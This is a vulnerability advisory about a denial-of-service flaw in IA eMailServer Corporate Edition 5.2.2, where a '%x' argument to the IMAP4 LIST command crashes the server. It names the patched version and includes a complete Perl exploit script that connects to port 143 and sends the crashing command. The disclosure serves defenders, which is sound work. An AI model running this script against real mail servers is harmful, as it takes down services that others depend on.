Denial of Service Vulnerability in True North Software, Inc. IA eMailServer Corporate Edition Version: 5.2.2. Build: 1051.

[Reed Arvin <reedarvin () gmail com>]

Summary:
Denial of Service Vulnerability in True North Software, Inc. IA
eMailServer Corporate Edition Version: 5.2.2. Build: 1051.
(http://www.tnsoft.com/)

Details:
Input to the IMAP4 LIST command is not properly checked and/or
filtered. Issuing a single character '%x' as the second argument to
the LIST command will cause the MailServer.exe process to die.

Vulnerable Versions:
True North Software, Inc. IA eMailServer Corporate Edition Version:
5.2.2. Build: 1051.

Patches/Workarounds:
IA eMailServer Corporate Edition Version: 5.3.4. Build: 2019. is not
vulnerable to this attack. It is available at http://www.tnsoft.com/.

Exploit:
Run the following PERL script against the server. The process will die.

#===== Start IAeMailServer_DOS.pl =====
#
# Usage: IAeMailServer_DOS.pl <ip>
#        IAeMailServer_DOS.pl 127.0.0.1
#
# True North Software, Inc. IA eMailServer Corporate Edition
# Version: 5.2.2. Build: 1051.
#
# Download:
# http://www.tnsoft.com/
#
#############################################################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => "143",
                                    Proto    => "TCP"))
{
        print "Attempting to kill IA eMailServer at $ARGV[0]:143...";

        sleep(1);

        print $socket "0000 LOGIN hello moto\r\n";

        sleep(1);

        print $socket "0001 LIST 1 \%x\r\n";

        close($socket);
}
else
{
        print "Cannot connect to $ARGV[0]:143\n";
}
#===== End IAeMailServer_DOS.pl =====

Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com/)

Vulnerability discovered using PeachFuzz
(http://reedarvin.thearvins.com/tools.html)